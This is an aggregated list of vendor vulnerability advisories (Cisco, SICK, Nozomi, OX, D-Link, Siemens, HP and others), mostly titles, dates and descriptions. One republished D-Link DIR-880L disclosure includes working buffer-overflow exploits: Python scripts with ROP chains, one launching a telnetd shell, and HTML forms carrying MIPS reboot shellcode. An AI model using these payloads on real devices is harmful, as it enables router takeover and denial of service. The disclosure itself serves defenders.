cisco-sa-clamav-ole2-h549rpha ClamAV OLE2 File Format Decryption Denial of Service Vulnerability 2025-01-22T16:00:00+00:00 2025-01-22T16:00:00+00:00
cisco-sa-bw-sip-dos-msysbrmt Cisco BroadWorks SIP Denial of Service Vulnerability 2025-01-22T16:00:00+00:00 2025-01-22T16:00:00+00:00
cisco-sa-thousandeyes-cert-pqtjuv9n Cisco ThousandEyes Endpoint Agent for MacOS and RoomOS Certificate Validation Vulnerability 2025-01-08T16:00:00+00:00 2025-01-13T22:15:18+00:00
cisco-sa-snort-rf-bypass-oy8f3pnm Multiple Cisco Products Snort Rate Filter Bypass Vulnerability 2024-10-23T16:00:00+00:00 2025-01-13T16:44:31+00:00
cisco-sa-thousandeyes-cert-pqtJUv9N Cisco ThousandEyes Endpoint Agent for MacOS and RoomOS Certificate Validation Vulnerability 2025-01-08T16:00:00+00:00 2025-01-13T22:15:18+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 2025-02-14T14:00:00.000Z 2025-02-21T14:00:00.000Z
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
SCA-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
SCA-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
SCA-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
sca-2023-0005 Vulnerabilities in SICK EventCam App 2023-06-19T11:00:00.000Z 2023-06-19T11:00:00.000Z
SCA-2023-0005 Vulnerabilities in SICK EventCam App 2023-06-19T11:00:00.000Z 2023-06-19T11:00:00.000Z
sca-2023-0004 Vulnerabilities in SICK FTMg 2023-05-11T13:00:00.000Z 2023-05-11T13:00:00.000Z
SCA-2023-0004 Vulnerabilities in SICK FTMg 2023-05-11T13:00:00.000Z 2023-05-11T13:00:00.000Z
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
SCA-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
sca-2023-0002 Use of Telnet in multiple SICK Flexi Soft and Flexi Classic Gateways 2023-04-11T10:00:00.000Z 2023-04-11T10:00:00.000Z
SCA-2023-0002 Use of Telnet in multiple SICK Flexi Soft and Flexi Classic Gateways 2023-04-11T10:00:00.000Z 2023-04-11T10:00:00.000Z
sca-2023-0001 Bootloader mode vulnerability in Flexi Soft Gateways v3 2023-02-20T14:00:00.000Z 2023-02-20T14:00:00.000Z
SCA-2023-0001 Bootloader mode vulnerability in Flexi Soft Gateways v3 2023-02-20T14:00:00.000Z 2023-02-20T14:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
OXAS-ADV-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
OXDC-ADV-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC step7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. simmocode ES is the core software package for simmocode pro configuration, commissioning, operation and diagnostics. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. of di-8200 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is 